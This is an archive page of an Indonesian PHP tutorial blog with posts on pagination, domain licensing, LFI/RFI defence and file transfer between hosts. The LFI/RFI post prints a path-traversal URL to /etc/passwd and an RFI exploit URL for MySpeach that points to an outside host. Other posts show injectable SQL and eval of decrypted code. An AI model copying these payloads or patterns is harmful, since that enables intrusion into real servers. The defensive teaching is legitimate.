Home » Archives for April 2013

Tuesday, April 23, 2013

buat paging class dengan PHP


dulu ane pernah iseng2 nyobain script2 PHP dari temen. eh malah sekarang jd nagih deh... dan sekarang ane mau ngulas gimana buat paging class....
mungkin kalo ada yang udah post ane ga tahu om, jadi maaf ya...??
semoga belum ada omz...

paging class....??
opo iku...??
mungkin sebagaian ada yang ga paham dengan ini....
hhehe...

ada yang pernah lihat google...??
di bawah itu kan ada halaman 1,2,3,4,dst...
atau GOOOOOOOOOOOOOOOOGLE.....
nah, itulah yang dinamakan paging class.... :)

nah di sini saya ingin memberikan code nya, tapi yang masih standard om...
<?php
mysql_connect("localhost","root","12345");mysql_select_db("pintar");
//cara di bawah ini untuk menentukan batas data, posisi, dan halaman ..$batas   7;$page $_GET['page'];
if(empty($page)){
    $halaman=1;
        $posisi=0;
   
}else{
    $posisi = ($page-1) * $batas;
}
// Sesuaikan perintah SQL$sql="select * from anggota limit $posisi,$batas";$query=mysql_query($sql);
$no=$posisi+1// Agar penomoran mengikuti pagingwhile ($data=mysql_fetch_array($query)){
  echo "$no $data[nm_mahasiswa] $data[universitas]<br>";
  $no++;
}
//Hitung total data dan link page (1,2,3,4,dst) ...echo "<br>Halaman : ";
$sql2="select * from anggota";$query2=mysql_query($sql2);$result2=mysql_num_rows($query2);$jumlahpage=ceil($result2/$batas);$i=1;
while($i<=$jumlahpage){
if ($i != $page)
{
    echo " <a href=$_SERVER[PHP_SELF]?page=$i>$i</A> | ";
}
else
{
    echo " <b>$i</b> | ";
}$i++;
}
echo "<p>Total anggota : <b>$result2</b> orang</p>";?>

nah, ini nanti hasilnya akan keluar page-page lanjutan halaman 2,3,4,5,6, dst dengan data yang ditampilkan sejumlah $batas diatas...
jika data yang mau ditampilkan 10 perhalaman, $batas tinggal di ubah $batas = 10;

nah, selamat mencoba ya gan...
InsyaAlloh, kedepannya bakal banyak yang di kupas tuntas setajam cutter....
#niru tayangan nya RC*I...
9:10 AM  Unknown  
Read More

Membuat License php by domain


ane langsung aja dah ... ini cara buat license dengan membaca domain website dan mengenksirpsi license tersebut...
maaf yah kalo nora... maklum masih newbie

 1. buat file untuk membuat generate license
function encode_mac64($string) { $data = base64_encode($string);$data = str_replace(array('+','/','='),array('-','_',''),$data); return $data;}
function encode_mac($value){
            $skey  = "sigitpamungkas"; if(!$value){return false;} $text = $value;
            $iv_size = mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256, MCRYPT_MODE_ECB);
            $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);
            $crypttext = mcrypt_encrypt(MCRYPT_RIJNDAEL_256, skey, $text, MCRYPT_MODE_ECB, $iv);
            return trim(encode_mac64($crypttext));
}

//enksripsi cek domain 

$getif = encode_mac('if (!in_array($_SERVER[HTTP_HOST], $allowed_hosts)) {echo "<center><h1>Aplication No License<br/> <h1></center>";exit;}');

//domain yang di perbolehkan
$url1 = encode_mac('$allowed_hosts = array("192.168.1.64","localhost",  "127.0.0.1");');


//konfigurasi database
$config = encode_mac('$SQLHOST  = "localhost";
$SQLUSER  = "sigit";
$SQLPASS  = "sigit";
$SQLDB      = "XXXXX;
$SQLCONN  = ADONewConnection("mysql");
$SQLCONN->PConnect($SQLHOST, $SQLUSER, $SQLPASS, $SQLDB);
if(!$SQLCONN->PConnect($SQLHOST, $SQLUSER, $SQLPASS, $SQLDB))  { echo "<center><h1>Aplication No Connect Database<br/><h1></center>";exit;};');




//cetak hasil enksirpsi
$setting = '<div>buka file config/config.php dan silakan ganti baris ini <br/>
            $setting="'.$url1.', '.$getif .','.$config.'";</div>';

echo $setting; 
result hasil dari file di ata adalah
$setting="EAkd5GnrC4hqt6C_x6jfEpRUvCib09WDjYUcbaPnO8yOx2a_UqZ5i5SLYzLhIhlo8K8iHdUtcbTmXiYrFcS8LuEQPuK-xTNjPMIby89gJD9tfmCz6gqMhfHYNIGezQFi, lo6ibliuAWBZUFUglsO2aNG8SFhI6JwIjn3AOEDKWTfRwTTr8uUwJrQiwLtINfGP7nIODm7d8PikYcyq2a7cF6zmm8vcfV17x9hLFEqEfNJyk8DlN4vcjpDfwTIvhkx-Et1N5FH7KZbnhah1CpqvMohKnnu1Q7phZb9orkfamzwGUrhuKxcycjf-ymwcbWWr3FyKkXdDcRsPJR2NR47GLQ3mKz-yWEf8p9r0pSoaj2ko1mCWpWDTJ-kpII6A_dSrFNjZfjWnjbdyNOQaIUJFylILGHv9-AbtYrPdbJyG-oxB3bIs69PYDU70JbxfACsDT_zN8R6_jjfur9IItvroj1JgjEE582RzsBTkNuVRFhr3-e04Rv3TQ0u5VrqHnnGqQg5I3lfdIM7lT7N9ZcXD5mR3FDc1ZK8klYfsmQvGziRzHQCdlGMaZiw0oHz0ytPUKkcJ6HTWPG66_zpRSxO29g,2JS1nDHM7dS8yYP7cBblbKlr9jcRTLzhky9R2hGut45mb8i_X3baJiX0IIJttqJm8roGHIS8zAxai54OzpUQ29NY8x9-QzUSFP_bB3W2pWZ_XXV7UkhggM-iX1yW620lfe6mLxgAinZQ-o-LkfrX4MwhsZrZgGY50RyUG3tx0dT5Z8axHQZghv84HrO3_tUkrzr4NAuO1Gj4q1UOD4QrvQxtOzKUlkUTzQVf3V7E6X8teM87djKd6cpTEEKUPaI49jp0-VlQrcK21j1oSI2aZKrwbn5tlFYtpI44ChSORyWRVNUE2KbwOFQ6t4jChKVtybHoQpjsM4HwjmFj9S4VhO94KXkIEeGvGk6KnchH9Sv6AGSpgBoTQoO6SOda51G254O_0wncTAr-rmr9DoO2ZHT4hCqLk18Z2OlOxTOHLoRjOMeObxO1UVO_7dD6PpF3Sd8PWF5b7GL3LZ8tutGDx6Oy5I7a4a_g2lR250jQmPCcEZWE7AQKqRdb3KYweA5dtlijKvewx90p6kQsucydeWIKqHYUO1zN1ZK0Z5WAQsApNOCjjKkUw5Vzw1H0X1MoymbI7IlCEeL1JAothTjS-Wb7UkRSENxlkm9QFjl4Kg0pBQc80l7olqnDWqDyJ5aOY3E21zkZzWYuJXqfzLGLPhHAGaa_RIOE7zLDkixFJmzdB_nJUCkmz5xxM6cKE12p5uL0WgVEV4sO9xZpd_S4Ak-PAZ54qCDhx5Vnxs5J32s9RuffVLAzgppr-X1vEHkU5aL7JhVXowbVrqu-GyCPmUvrTcv-jCzTMW5vs04zoYA"; 
nah sekarang tinggal copy hasil enskripsi ini ke table configurasi

sehingga menjadi seperti ini
function decode_mac64($string) {$data str_replace(array('-','_'),array('+','/'),$string); $mod4 strlen($data) % 4;if ($mod4) {$data .= substr('===='$mod4); }return base64_decode($data);}




function decode_mac($value=''){
    $skey  "sigitpamungkas";
    if(!$value){return false;}
    $crypttext decode_mac64($value);
    $iv_size mcrypt_get_iv_size(MCRYPT_RIJNDAEL_256MCRYPT_MODE_ECB);
    $iv mcrypt_create_iv($iv_sizeMCRYPT_RAND);
    $decrypttext mcrypt_decrypt(MCRYPT_RIJNDAEL_256skey$crypttextMCRYPT_MODE_ECB$iv);
    return trim($decrypttext);
}


$setting="EAkd5GnrC4hqt6C_x6jfEpRUvCib09WDjYUcbaPnO8yOx2a_UqZ5i5SLYzLhIhlo8K8iHdUtcbTmXiYrFcS8LuEQPuK-xTNjPMIby89gJD9tfmCz6gqMhfHYNIGezQFi, lo6ibliuAWBZUFUglsO2aNG8SFhI6JwIjn3AOEDKWTfRwTTr8uUwJrQiwLtINfGP7nIODm7d8PikYcyq2a7cF6zmm8vcfV17x9hLFEqEfNJyk8DlN4vcjpDfwTIvhkx-Et1N5FH7KZbnhah1CpqvMohKnnu1Q7phZb9orkfamzwGUrhuKxcycjf-ymwcbWWr3FyKkXdDcRsPJR2NR47GLQ3mKz-yWEf8p9r0pSoaj2ko1mCWpWDTJ-kpII6A_dSrFNjZfjWnjbdyNOQaIUJFylILGHv9-AbtYrPdbJyG-oxB3bIs69PYDU70JbxfACsDT_zN8R6_jjfur9IItvroj1JgjEE582RzsBTkNuVRFhr3-e04Rv3TQ0u5VrqHnnGqQg5I3lfdIM7lT7N9ZcXD5mR3FDc1ZK8klYfsmQvGziRzHQCdlGMaZiw0oHz0ytPUKkcJ6HTWPG66_zpRSxO29g,2JS1nDHM7dS8yYP7cBblbKlr9jcRTLzhky9R2hGut45mb8i_X3baJiX0IIJttqJm8roGHIS8zAxai54OzpUQ29NY8x9-QzUSFP_bB3W2pWZ_XXV7UkhggM-iX1yW620lfe6mLxgAinZQ-o-LkfrX4MwhsZrZgGY50RyUG3tx0dT5Z8axHQZghv84HrO3_tUkrzr4NAuO1Gj4q1UOD4QrvQxtOzKUlkUTzQVf3V7E6X8teM87djKd6cpTEEKUPaI49jp0-VlQrcK21j1oSI2aZKrwbn5tlFYtpI44ChSORyWRVNUE2KbwOFQ6t4jChKVtybHoQpjsM4HwjmFj9S4VhO94KXkIEeGvGk6KnchH9Sv6AGSpgBoTQoO6SOda51G254O_0wncTAr-rmr9DoO2ZHT4hCqLk18Z2OlOxTOHLoRjOMeObxO1UVO_7dD6PpF3Sd8PWF5b7GL3LZ8tutGDx6Oy5I7a4a_g2lR250jQmPCcEZWE7AQKqRdb3KYweA5dtlijKvewx90p6kQsucydeWIKqHYUO1zN1ZK0Z5WAQsApNOCjjKkUw5Vzw1H0X1MoymbI7IlCEeL1JAothTjS-Wb7UkRSENxlkm9QFjl4Kg0pBQc80l7olqnDWqDyJ5aOY3E21zkZzWYuJXqfzLGLPhHAGaa_RIOE7zLDkixFJmzdB_nJUCkmz5xxM6cKE12p5uL0WgVEV4sO9xZpd_S4Ak-PAZ54qCDhx5Vnxs5J32s9RuffVLAzgppr-X1vEHkU5aL7JhVXowbVrqu-GyCPmUvrTcv-jCzTMW5vs04zoYA";$j=0;
$applay explode(','$setting);
    for ($i=0$i<count($applay); $i++) {
     $coba[$j]= decode_mac($applay[$i]);
    eval($coba[$j]);
    $j++;


di dalm eksipsiu ini terdapat domain mana yang di perboleh kan dan configurasi database 
sekian share dari ane semoga bermanfaat

 maaf kakak om ane masih newbie



 
9:06 AM  Unknown  
Read More

mengatasi LFI (local file inclusion) dan RFI (Remote file inclusion)


malam om.... 
ane dellacroug mau ngasih tutor lagi nie om...
karena postingan ane kemaren di indikasikan belum di sanitasi dari LFI dan RFI...
nah, di sini ane mau nepatin janji ane nie untuk memperbaiki postingan ane yang Membangun website bagian 2 thanks for om genta, om afika666, dan om-om lain yang ngasih kritik dan saran...

 langsung aja ni ya..
apa sih itu LFI, dan RFI...??

 LFI singkatan dari Local File inclusion, adalah kerentanan proses pada file yang di include atau dimasukkan pada server saat browsing. kerentanan ini terjadi saat file yang di include kan atau file masukan tidak di filterisasi dan di sanitasi script ny dan mengijinkan untuk mengaksses file lain dengan mudah.

 contoh type script yang rentan dengan LFI ,
<?php
   $file $_GET['file'];
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   {
       include("index.php");
   }
   ?>
pemanggilan link sebagai berikut
Quote:
http://example.com/index.php?file=contactus.php

nah alamat script diatas rentan dengan serangan dari orang2 yang tertarik dengan file-file lain... dan biasanya mereka menggunakan teknik LFI. contoh script dari penyerang...

Quote:
http://example.com/index.php?file=../../...etc/passwd

nah untuk pencegahan nya kita bisa menggunakan operator str_replace().
PHP Code:
str_replace ( $search , $replace , $subject)
//$search = adalah kata yang akan diganti;
//$replace = adalah kata2 penggantinya;
//$subject = adalah kaliamt atau phrase yang didalamnya termuat kata-kata yang akan diganti.
jadi script diatas maksudnya, saat attacker mencoba mengakses
Quote:
http://example.com/index.php?file=../../...etc/passwd
tidak akan bisa, karena ../ akan langsung diganti karakter kosong atau dihapus...

nah untuk yang RFI...
RFI atau remote file inclusion dapat diartikan menyisipkan sebuah program dari luar file dalam sebuah server dengan tujuan file yang dimasuki tersebut akan bekerja saat program inject tersebut dieksekusi,,,
dan program yang di inject tersebut bisa mengontrol server, bahkan bisa mengambil kedudukan sebagai admin root..

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar
webserver dengan eksploit script injeksi PHP:
Quote:
http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
Diatas adalah contoh eksploitasi MySpeach < = v3.0.2 (my_ms[root])

Cara terbaik untuk mencegah serangan RFI adalah untuk tidak pernah menggunakan data masukan seenaknya dalam file termasuk permintaan.

Mengambil contoh dari sebelumnya, cara yang lebih aman untuk menerapkan situs ini adalah dengan menggunakan sebuah array untuk memetakan parameter halaman dari link ke nama file yang sebenarnya di server:
PHP Code:
<?php

 $page_files=array( 'about'=>'about.html',

                    'photos'=>'photos.html',

                    'contact'=>'contact.html',

                    'home'=>'home.html'

                  );

 

if (in_array($_GET['page'],array_keys($page_files))) {

      include $page_files[$_GET['page']];

 } else {

      include $page_files['home'];

}

?>
nah jadi tetap dalam keamanan script kita harus sanitasi dan validasi agar para attacker tidak bisa masuk mengobrak abriknya... 

nah sekian mungkin tutor untuk mengatasi LFI dan RFI...
mungkin ada om-om yang mau nambahi saya persilahkan... 

referensi ane dari sini om..
1. http://www.esecurityplanet.com/browser-s...tacks.html
2. http://www.binushacker.net/remote-file-i...n-rfi.html
3. http://hakipedia.com/index.php/Local_File_Inclusion
4. http://translate.google.com/ 

insyaAlloh selanjutnya ane ke membangun website bagian 3...
 om...
 



8:56 AM  Unknown  
Read More

Thursday, April 11, 2013

Cara Cepat Transfer File antar Hosting dengan php

Permisi temen-temen sekalian, om mimin, momod, dan om sekalian,, Newbie sekedar ingin nabung ingetan sekaligus kali aja ada manfaat bagi temen-temen sekalian. Kalaupun ada sesuatu yang kurang berkenan menurut rule yang ada dari tulisan ini, mohon dibantu di delete note saya ini. Pada kesempatan kali ini, tema yang mau saya share adalah Simsalabim :: Cara Cepat Transfer File antar Hosting . General review, saya sedang ingin pindah hosting. Wah dalah, setelah saya periksa, file ane di hostingan lama itu sebesar 600 MB nan. Bagi temen-temen yang punya koneksi supercepat, pasti nggak maslaah kalau musti download segala file yang ada di public html untuk nantinya dipasangkan di hostingan baru. Lah, bagi saya yang koneksinya sekedar paket socialitanya speedy, jelas mendownload 600 MB menjadi persoalan tersendiri sebab lamanya dan kadang nggak beres di downloadnya atau semisal terjadi file corrupt . Nah, saya kemudian berpikir, ada kah cara memindahkan file yang lumayan besar gitu tanpa repot-repot nunggu download, juga harus upload lagi yang benar-benar menguras kecepatan paket internet kita? adakah cara agar satu hosting ke hosting lainnya bak mindah file saja dari folder satu ke folder lain bak kita pindah file satu partisi daari folder satu ke folder lain melalui windows eksplorer? udah gitu, caranya mudah nggak makai banyak script aneh yang bikin keriting rambut newbie seperti saya. Akhirnya, atas kebaikan seorang om [belum dikasih tau IDnya yang disini, taunya di FBnya aja] bisa menshare script ringkes yang work sangat keren. Bayangkan, transfer langsung antar hosting file saya sebesar 600 MBnan nggak sampai 30 detik. Subhanallah,, sangat cepat. Gimana metodenya? Berikut akan saya sharekan. Namun saya anggap temen-temen sudah memahami penggunaan area file manager pada cpanel hosting masing-masing. Sebelumnya dua cpanel hosting yang mau ditransfer harus dibuka bersamaan [agar mudah pengaturannya saja]. agar memudahkan diskusi, saya akan gunakan beberapa istilah seperti alamathostinglama.com (alamat URL utama hosting lama), alamathostingbaru.com (alamat URL utama hosting baru/ yang dijadikan tujuan pindah), fileyangmaudipindah.zip (hasil zip segala folder atau file wordpress yang ada di hostingan), dan simsalabim.php (script php yang harus dibuat sebagai perintah memindah file antar hosting). 1. BUka file manager di dua cpanel di alamathostinglama.com dan alamathostingbaru.com pada satu browser (saat praktek saya gunakan crome). Compress dalam bentuk zip semua file yang mau ditransfer di alamathostinglama.com. Agar memudahkan proses belajar, please hasil zipnya dikasih nama fileyangmaudipindah.zip (atau yang penting anda ingat). 2. Sekarang buka notepad ++ milik anda, new file >> masukan Lalu, save dengan extensi .php dengan nama simsalabim.php. (catatan: rubah hxxp dengan http) 3. Upload simsalabim.php ke area public html di alamathostingbaru.com. Sehingga nantinya bisa kita akses dengan mengetikkan perintah alamathostingbaru.com/simsalabim.php pada browser yang anda gunakan. 4.Jika proses fileyangmaudipindah.zip sudah ready, dua area public html sudah terbuka, mari kita coba memindahkan file wordpress atau file apapun yang kita masukan ke compresan fileyangmaudipindah.zip. Caranya anda buka tab di browser yang sama, lalu masukan perintah alamathostingbaru.com/simsalabim.php Kalau benar, pada crome memproses dengan muncul muter muter kecil di area tab browser yang kita gunakan mengetik perintah. Misal proses / muter-muter sudah selesai, itu artinya fileyangmaudipindah.zip itu sudah dipindah ke public html di hostingan yang baru. 5.Untuk memastikan apakah sudah terpindah fileyangmaudipindah.zip-nya, refreshlah area hosting baru dengan menekan tombol GO yang ada pada area filemanager hostingan baru. Scroll ke bawah pada area file yang ada dikolom kanan, biasanya sudah ada filenya disitu.
8:16 AM  Unknown  
Read More

Newer Posts Older Posts Home